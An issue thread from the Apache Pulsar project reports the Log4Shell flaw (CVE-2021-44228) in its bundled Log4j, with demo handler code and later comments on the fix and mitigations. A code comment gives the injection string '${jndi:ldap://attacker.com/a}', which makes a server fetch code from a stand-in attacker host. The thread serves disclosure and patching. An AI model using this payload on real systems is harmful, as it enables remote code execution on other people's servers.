### ISSUE TITLE
[security vulnerability] Remote code injection in Log4j

### ISSUE THREAD

**Issue by HQebupt** [apache/pulsar#13232]
**Describe the security vulnerability**
There is a remote code injection in Apache Log4j 2.x <= 2.14.1.
Attackers can directly construct malicious requests to trigger remote code execution vulnerabilities which is verified by Alibaba Cloud security team.
- CVE ID: CVE-2021-44228

The current Pulsar is using 2.14.0 (`<log4j2.version>2.14.0</log4j2.version>` in pom.xml)
Log4j versions prior to 2.15.0 are subject to a remote code execution vulnerability via the ldap JNDI parser. However,  the hot fix version is log4j-2.15.0-rc2.

**To Reproduce**
Steps to reproduce by following demo code.
```java
public class VulnerableLog4jExampleHandler implements HttpHandler {
    static Logger log = Logger.getLogger(log4jExample.class.getName());
    /**
     * A simple HTTP endpoint that reads the request's User Agent and logs it back.
     *
     * This is basically pseudo-code to explain the vulnerability, and not a full example.
     *
     * @param he HTTP Request Object
     */
    public void handle(HttpExchange he) throws IOException {
        String userAgent = he.getRequestHeader("user-agent");
// This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
// The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
        log.info("Request User Agent:" + userAgent);
        String response = "<h1>Hello There, " + userAgent + "!</h1>";
        he.sendResponseHeaders(200, response.length());
        OutputStream os = he.getResponseBody();
        os.write(response.getBytes());
        os.close();
    }
}
```

**References:**
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- apache/logging-log4j2#608
- https://github.com/tangxiaofeng7/apache-log4j-poc
- https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0
- https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup

**Comment by YouJiacheng** [comment]
already fix: 
https://github.com/apache/pulsar/commit/b136a734eecf5719780f5dc4c97e7a7c395af3d6

>

**Comment by jonaskint** [comment]
> already fixed: #13226

Any idea when the actual tags will be released?

**Comment by lhotari** [comment]
Addressed by #13226 

I have posted information about Log4Shell mitigations for existing Pulsar releases on the mailing list: https://lists.apache.org/thread/pf8wfzt09c2dv4z291httlgdwtc1495c
https://lists.apache.org/thread/dbcy49yjsm6qtmxws2zf6zogv8yylq4c
